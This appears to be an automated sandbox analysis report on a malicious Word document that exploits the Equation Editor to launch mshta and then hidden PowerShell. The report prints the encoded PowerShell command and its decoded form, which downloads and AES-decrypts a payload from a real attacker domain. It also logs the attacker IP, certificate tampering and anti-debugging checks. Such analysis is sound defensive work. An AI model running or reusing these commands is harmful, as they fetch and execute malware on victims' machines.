Source: C:\Windows\System32\mshta.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\mshta.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\mshta.exe	Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Hooking and other Techniques for Hiding and Protection:

Disables application error messsages (SetErrorMode)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Network Connect: 185.82.23.166 443

Malware Analysis System Evasion:

Queries a list of all running processes

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Contains long sleeps (>= 3 min)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Enumerates the file system

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch

Found large amount of non-executed APIs

Show sources

Source: C:\Windows\System32\regsvr32.exe

API coverage: 8.8 %

May sleep (evasive loops) to hinder dynamic analysis

Show sources

Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE TID: 3192	Thread sleep time: -300000s >= -60s
Source: C:\Windows\System32\mshta.exe TID: 3252	Thread sleep time: -720000s >= -60s
Source: C:\Windows\System32\mshta.exe TID: 3252	Thread sleep time: -60000s >= -60s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3544	Thread sleep time: -922337203685477s >= -60s

Anti Debugging:

Creates guard pages, often used to prevent reverse engineering and debugging

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Memory allocated: page read and write and page guard

Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))

Show sources

Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE

System information queried: KernelDebuggerInformation

Checks if the current process is being debugged

Show sources

Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE	Process queried: DebugPort
Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE	Process queried: DebugPort

Contains functionality to read the PEB

Show sources

Source: C:\Windows\System32\regsvr32.exe

Code function: 9_1_100032DB mov eax, dword ptr fs:[00000030h]

9_1_100032DB

Enables debug privileges

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

May try to detect the Windows Explorer process (often used for injection)

Show sources

Source: msxsl.exe	Binary or memory string: Program Manager
Source: msxsl.exe	Binary or memory string: Shell_TrayWnd
Source: msxsl.exe	Binary or memory string: Progman

Creates a process in suspended mode (likely to inject code)

Show sources

Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\System32\mshta.exe mshta https://zstorage.biz/read.txt & XXXXXX C
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NOp -NOnI -w hIdden -e 'JABsAHcANgAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHoAcwB0AG8AcgBhAGcAZQAuAGIAaQB6AC8AZgAxADEAMQAuAHQAeAB0ACcAKQA7ACQAbgBnAEMAbQBJAHcAWQAgAD0AIABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbAB3ADYAKQA7ACQAagAxAFoAUwBLAFYARQBEADMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgACcAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAE0AYQBuAGEAZwBlAGQAJwA7ACQAagAxAFoAUwBLAFYARQBEADMALgBNAG8AZABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEMAaQBwAGgAZQByAE0AbwBkAGUAXQA6ADoAQwBCAEMAOwAkAGoAMQBaAFMASwBWAEUARAAzAC4AUABhAGQAZABpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBQAGEAZABkAGkAbgBnAE0AbwBkAGUAXQA6ADoAWg
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' /s 'C:\Users\user\AppData\Roaming\IkqJfeZNVt.txt'
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Users\user\AppData\Roaming\Microsoft\msxsl.exe unknown

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NOp -NOnI -w hIdden -e 'JABsAHcANgAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHoAcwB0AG8AcgBhAGcAZQAuAGIAaQB6AC8AZgAxADEAMQAuAHQAeAB0ACcAKQA7ACQAbgBnAEMAbQBJAHcAWQAgAD0AIABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbAB3ADYAKQA7ACQAagAxAFoAUwBLAFYARQBEADMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgACcAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAE0AYQBuAGEAZwBlAGQAJwA7ACQAagAxAFoAUwBLAFYARQBEADMALgBNAG8AZABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEMAaQBwAGgAZQByAE0AbwBkAGUAXQA6ADoAQwBCAEMAOwAkAGoAMQBaAFMASwBWAEUARAAzAC4AUABhAGQAZABpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBQAGEAZABkAGkAbgBnAE0AbwBkAGUAXQA6ADoAWg
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NOp -NOnI -w hIdden -e 'JABsAHcANgAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcABzADoALwAvAHoAcwB0AG8AcgBhAGcAZQAuAGIAaQB6AC8AZgAxADEAMQAuAHQAeAB0ACcAKQA7ACQAbgBnAEMAbQBJAHcAWQAgAD0AIABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAbAB3ADYAKQA7ACQAagAxAFoAUwBLAFYARQBEADMAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgACcAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAE0AYQBuAGEAZwBlAGQAJwA7ACQAagAxAFoAUwBLAFYARQBEADMALgBNAG8AZABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEMAaQBwAGgAZQByAE0AbwBkAGUAXQA6ADoAQwBCAEMAOwAkAGoAMQBaAFMASwBWAEUARAAzAC4AUABhAGQAZABpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBQAGEAZABkAGkAbgBnAE0AbwBkAGUAXQA6ADoAWg

Encrypted powershell cmdline option found

Show sources

Source: unknown	Process created: Base64 decoded $lw6 = (New-Object System.Net.WebClient).DownloadString('https://zstorage.biz/f111.txt');$ngCmIwY = [Convert]::FromBase64String($lw6);$j1ZSKVED3 = New-Object 'System.Security.Cryptography.AesManaged';$j1ZSKVED3.Mode = [System.Security.Cryptography.CipherMode]::CBC;$j1ZSKVED3.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$j1ZSKVED3.BlockSize = 128;$j1ZSKVED3.KeySize = 256;$j1ZSKVED3.IV = $ngCmIwY[0..15];$j1ZSKVED3.Key = [System.Convert]::FromBase64String('MTY5RjJGMDdFQURGRDUzMDIwNjJCMEY1
Source: C:\Windows\System32\mshta.exe	Process created: Base64 decoded $lw6 = (New-Object System.Net.WebClient).DownloadString('https://zstorage.biz/f111.txt');$ngCmIwY = [Convert]::FromBase64String($lw6);$j1ZSKVED3 = New-Object 'System.Security.Cryptography.AesManaged';$j1ZSKVED3.Mode = [System.Security.Cryptography.CipherMode]::CBC;$j1ZSKVED3.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$j1ZSKVED3.BlockSize = 128;$j1ZSKVED3.KeySize = 256;$j1ZSKVED3.IV = $ngCmIwY[0..15];$j1ZSKVED3.Key = [System.Convert]::FromBase64String('MTY5RjJGMDdFQURGRDUzMDIwNjJCMEY1

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID

Show sources

Source: C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Queries the installation date of Windows

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Windows\System32\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\assembly\GAC_32\System.Data\2.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation

Lowering of HIPS / PFW / Operating System Security Settings:

Adds / modifies Windows certificates

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 Blob

Remote Access Functionality:

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Show sources

Source: C:\Windows\System32\regsvr32.exe	Code function: 9_1_1000901D SQLBindParameter,	9_1_1000901D
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_1_10009068 SQLBindParameter,	9_1_10009068
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_1_1000909D SQLBindParameter,	9_1_1000909D
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_1_10008F1D SQLBindParameter,SQLBindParameter,	9_1_10008F1D
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_1_10008B47 wcslen,wcscpy,SQLBindParameter,	9_1_10008B47
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_1_10008F87 SQLBindParameter,	9_1_10008F87
Source: C:\Windows\System32\regsvr32.exe	Code function: 9_1_10008FD1 SQLBindParameter,	9_1_10008FD1

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
